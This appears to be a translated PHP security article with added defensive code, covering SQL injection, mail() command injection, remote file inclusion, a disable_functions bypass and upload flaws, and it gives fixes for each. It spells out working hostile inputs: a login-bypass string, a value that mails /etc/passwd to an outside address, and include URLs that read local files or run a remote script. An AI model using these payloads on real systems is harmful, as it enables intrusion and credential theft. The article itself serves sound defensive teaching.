Shaun Clowes' article "Exploiting Common Vulnerabilities in PHP Applications" is indeed well written and covers many aspects. This article only adds a few other issues that it has not mentioned, and it focuses on solving the problems rather than on attacking.
1. The ancient SQL statement trick
In the default configuration, even if you forget to copy php.ini to /usr/local/lib/php.ini, php still has magic_quotes_gpc = on.
In this way, single quotes ('), double quotes ("), backslashes (\) and NUL characters (the null byte) in all variables coming from GET/POST/Cookie
are prefixed with a backslash, so that the database can be queried correctly.
But php-4-RC2 introduced a configuration file php.ini-optimized, and that optimized php.ini has
magic_quotes_gpc = off. Some network administrators may copy php.ini-optimized to
/usr/local/lib/php.ini, which is dangerous. Take, for example, a relatively simple login check, assuming the necessary characters are not filtered:
select * from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]'
In the user box and the password box we can enter 1' or 1='1 to pass the check. This is an antique method. The statement
becomes the following:
select * from login where user='1' or 1='1' and pass='1' or 1='1'
Because or 1='1' is always true, the check passes.
The best solution is to filter out all unnecessary characters, and we recommend that every GET/POST/Cookie variable used in SQL
is passed through a custom function like this one:
function gpc2sql($str) {
    // If magic_quotes_gpc is on, PHP has already escaped the value; escape it ourselves otherwise.
    if (get_magic_quotes_gpc() == 1)
        return $str;
    else
        return addslashes($str);
}
Its main purpose is to let your program be ported securely to systems with either setting.
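The following is an added example, not code from the original article: it applies the gpc2sql() wrapper above to the login query and prints the SQL produced for the hostile input from the text, with and without escaping. It also adds a caveat the article does not state: addslashes() only protects values inside quoted literals, so a numeric comparison needs a type cast instead. get_magic_quotes_gpc() was removed in PHP 8, so the call is guarded with function_exists() (which then behaves as if magic quotes were off).

```php
<?php
// Added example, not from the original article. Applies the article's
// gpc2sql() wrapper to the login query and shows the effect on the
// hostile input from the text. get_magic_quotes_gpc() was removed in
// PHP 8, so it is guarded with function_exists().

function gpc2sql($str) {
    // Escape only if PHP has not already done so via magic_quotes_gpc.
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc() == 1) {
        return $str;
    }
    return addslashes($str);
}

// $user and $pass stand for $HTTP_POST_VARS['user'] and ['pass'].
function build_login_query($user, $pass, $escape) {
    if ($escape) {
        $user = gpc2sql($user);
        $pass = gpc2sql($pass);
    }
    return "select * from login where user='$user' and pass='$pass'";
}

// Constructed hostile input, the same value the text uses.
$input = "1' or 1='1";

// Without escaping, the quote closes the literal and "or 1='1'" is parsed
// as SQL, giving the always-true statement quoted in the text.
echo build_login_query($input, $input, false), "\n";

// With escaping, every quote in the input is backslashed, so the whole
// value stays inside one string literal and is compared as plain text.
echo build_login_query($input, $input, true), "\n";

// Caveat: addslashes() only protects quoted literals. A numeric
// comparison such as "where id=$id" has no quotes to escape, so the
// value must be forced to an integer instead.
function id_clause($id) {
    return 'where id=' . (int) $id;
}
echo id_clause("1 or 1=1"), "\n";
```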
2. The fifth parameter of the mail function
In php-4.0.5, the mail function gained a fifth parameter for setting additional command line arguments when the mail is actually sent.
However, special shell command characters are not checked properly, so this causes a serious command execution problem. Take the example from the manual:
mail("nobody@aol.com", "the subject", $message, "From: webmaster@$SERVER_NAME", "-fwebmaster@$SERVER_NAME");
This is problematic: if $SERVER_NAME = "; mail san@xfocus.org </etc/passwd", the machine's password file is sent
to my mailbox.
Here I would like to remind you that several examples in the PHP manual have security problems. Do not copy them as they are; they only demonstrate
the basic functionality.
For the mail function, either filter illegal characters such as (;) out of anything passed as the fifth parameter, or, if you do not need the fifth parameter at all,
modify ext/standard/mail.c in the php source package: before the line if (extra_cmd != NULL) { add the following line:
extra_cmd = NULL;
Then recompile.
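The following is an added example, not code from the original article. safe_sender(), sender_option() and send_notice() are hypothetical helpers that validate the envelope sender address before it reaches the fifth parameter of mail(), and refuse to send when it does not validate; the hostile value is constructed after the one quoted in the text, with a placeholder attacker address.

```php
<?php
// Added example, not from the original article. Hypothetical helpers that
// validate the sender before it reaches mail()'s fifth parameter, which is
// appended to the sendmail command line.

function safe_sender($addr) {
    // Accept only a conservative address alphabet: no spaces, quotes,
    // semicolons, redirections or other shell metacharacters. \z rather
    // than $ so a trailing newline cannot slip through.
    if (!preg_match('/^[A-Za-z0-9._+-]+@[A-Za-z0-9.-]+\z/', $addr)) {
        return false;
    }
    return $addr;
}

// Build the "-f" option for mail(), or false if the address is unsafe.
function sender_option($addr) {
    $clean = safe_sender($addr);
    return ($clean === false) ? false : '-f' . $clean;
}

// Refuse to send at all when the sender does not validate, rather than
// falling back to passing the raw value through.
function send_notice($to, $subject, $body, $host) {
    $sender = "webmaster@$host";
    $opt = sender_option($sender);
    if ($opt === false) {
        return false;
    }
    return mail($to, $subject, $body, "From: $sender", $opt);
}

// Constructed inputs: a normal host name, and a hostile $SERVER_NAME
// value of the kind shown in the text (placeholder attacker address).
$good = 'www.example.com';
$bad  = '; mail attacker@example.org </etc/passwd';
var_dump(sender_option("webmaster@$good")); // only letters, digits and dots: accepted
var_dump(sender_option("webmaster@$bad"));  // contains ; < / and spaces: rejected
```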
3. The require and include functions in the UNIX version
The require and include functions of the Windows version do not support HTTP and FTP remote file inclusion, while the UNIX version supports remote file inclusion by default.
require and include, whatever the extension of the file, include it as part of the program and execute it.
When writing programs, many require or include calls are unavoidable for modularization and portability,
and sometimes a variable is used as the parameter, as in include("$something"). If the $something parameter can be controlled
and is not filtered, the result is miserable.
First, you can view any file the web user has read permission on. Suppose this program is called http://victim/test.php; then the following
URL, http://victim/test.php?something=/etc/passwd, shows the /etc/passwd file.
In addition, you can execute commands through functions contained in a remote file. For example, if I create a file test.php on www.xfocus.org with the following content:
Then I can use the following URL to execute the command:
http://victim/test.php?something=http://www.xfocus.org/test.php?cmd=uname
phpMyAdmin also had this problem, and it could be used to view any file we wanted to see. However, before the include it calls file_exists
to check whether the file exists, and file_exists does not support remote files, so the second method cannot be used directly. One can
instead request a URL containing php code so that it lands in Apache's log, and then include the Apache log so that it is executed.
However, Apache logs are usually large and contain too much messy information.
http://www.securereality.com.au/sradv1_8.txt describes a better approach:
a file upload creates a file with a name such as php8Ta02I in the server's temporary upload directory,
so the file_exists check passes and the uploaded script can be included and executed.
Therefore, you must be careful with the include and require functions, especially when the included file is specified by a parameter
that users can control. You can also disable remote file inclusion altogether: before php-4.0.3 this was done with disable-url-fopen-wrapper,
and in later versions with allow_url_fopen = off in php.ini.
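The following is an added example, not code from the original article: instead of passing the request parameter to include() directly, it resolves the parameter against a fixed table of allowed pages, so neither a local path nor a remote URL can reach include(). The page names and paths are hypothetical.

```php
<?php
// Added example, not from the original article. The parameter is used as
// a key into a fixed table, never as a path, so it cannot be turned into
// /etc/passwd or a remote URL whatever the request contains.

$allowed_pages = array(
    'home'    => 'pages/home.php',    // hypothetical paths
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
);

// Return the include path for $name, or false if it is not on the list.
function resolve_page($name, $allowed) {
    if (!is_string($name) || !isset($allowed[$name])) {
        return false;
    }
    return $allowed[$name];
}

// Constructed requests: a legitimate page name and the two hostile
// values from the text (a local file and a remote script).
$tests = array(
    'about',
    '/etc/passwd',
    'http://www.xfocus.org/test.php?cmd=uname',
);
foreach ($tests as $t) {
    $p = resolve_page($t, $allowed_pages);
    // Only the first entry maps to a file; the other two are rejected.
    echo $t, ' => ', ($p === false ? 'rejected' : $p), "\n";
}

// How the page itself would use it, falling back to a known page:
//   $page = resolve_page($_GET['something'], $allowed_pages);
//   if ($page === false) { $page = $allowed_pages['home']; }
//   include $page;
```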
4. disable_functions
In php-4.0.1, php.ini introduced a feature called disable_functions, which is useful for disabling certain functions.
For example, if disable_functions = passthru exec system popen is added to php.ini, calling one of these functions
only produces the message "Warning: system() has been disabled for security reasons".
Alas, this still leaves a way to execute system commands. Because php borrows many Perl features, you can, for example, use backticks (`) to run a command:
<?php
$output = `ls -al`;
echo "
$output
";
?>
This can only be prevented by enabling safe_mode. However, the hateful safe_mode has too many restrictions and makes other things rather inconvenient.
5. File upload
PHP file upload problems have been explained in the article http://www.securereality.com.au/sradv#1.html,
and this is indeed a serious problem. Generally, uploaded files are stored in the web directory, so attackers can easily obtain files on the system
that are readable by the web user.
Fortunately, php-4.0.3 and later provide the is_uploaded_file and move_uploaded_file functions. Upload programs on php-4.0.3 and above
must therefore not use the copy function but move_uploaded_file instead, which checks that the file really is an uploaded file. For php-4.0.2
and earlier, we recommend adding the following function and calling it before copy:
function is_uploaded_file($filename) {
    // Use the upload temp directory configured in php.ini, or PHP's default temp directory.
    if (!$tmp_file = get_cfg_var('upload_tmp_dir')) {
        $tmp_file = dirname(tempnam('', ''));
    }
    $tmp_file .= '/' . basename($filename);
    /* User might have trailing slash in php.ini... */
    // The file counts as uploaded only if it sits directly in the upload temp directory.
    return (ereg_replace('/+', '/', $tmp_file) == $filename);
}
This vulnerability existed on Security Focus for a long time, but there are many checks and conditions before the copy, so the attack is quite difficult.
Also, do not use environment variables, cookie variables, session variables and the like as the decisive conditions in a check, because these variables are too easy to forge.
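The following is an added example, not code from the original article: an upload handler that relies on is_uploaded_file() and move_uploaded_file() as the text advises, rejects forged tmp_name values, and stores the file under a server-chosen name outside the web directory. It assumes PHP 5.2 or later (for $_FILES, UPLOAD_ERR_OK and pathinfo() flags); $upload_dir and the form field name 'userfile' are assumptions.

```php
<?php
// Added example, not from the original article. Assumes PHP 5.2+;
// $upload_dir and the 'userfile' field name are assumptions.

$upload_dir = '/var/www/uploads-private'; // not served by the web server

// Returns the stored path on success, or an error string.
function store_upload($file, $upload_dir) {
    // $file is one entry of $_FILES; check PHP's own error code first.
    if (!isset($file['tmp_name']) || $file['error'] !== UPLOAD_ERR_OK) {
        return 'error: no file or upload failed';
    }
    // Refuse anything PHP did not itself receive as an upload, e.g. a
    // forged tmp_name pointing at an arbitrary readable file.
    if (!is_uploaded_file($file['tmp_name'])) {
        return 'error: not an uploaded file';
    }
    // Do not trust the client-supplied name; allow only a short list of
    // extensions and never store as a php file.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, array('png', 'jpg', 'gif', 'txt'), true)) {
        return 'error: file type not allowed';
    }
    // Server-chosen name, so the client cannot pick the stored path.
    $dest = $upload_dir . '/' . md5(uniqid('', true)) . '.' . $ext;
    // move_uploaded_file() repeats the is_uploaded_file() check and fails
    // if the source is not a genuine upload.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return 'error: could not store file';
    }
    return $dest;
}

if (!empty($_FILES['userfile'])) {
    echo store_upload($_FILES['userfile'], $upload_dir), "\n";
}
```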
Haha, I have a lot on my hands at the moment; the rest will come as I think of it. Other comrades are welcome to add and amend.
References
1. PHP 4 ChangeLog (http://www.php.net/ChangeLog-4.php)
2. A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications
(http://www.securereality.com.au/studyinscarlet.txt) and analysist's translation.
3. Remote command execution vulnerabilities in phpMyAdmin and phpPgAdmin
(http://www.securereality.com.au/sradv00008.txt)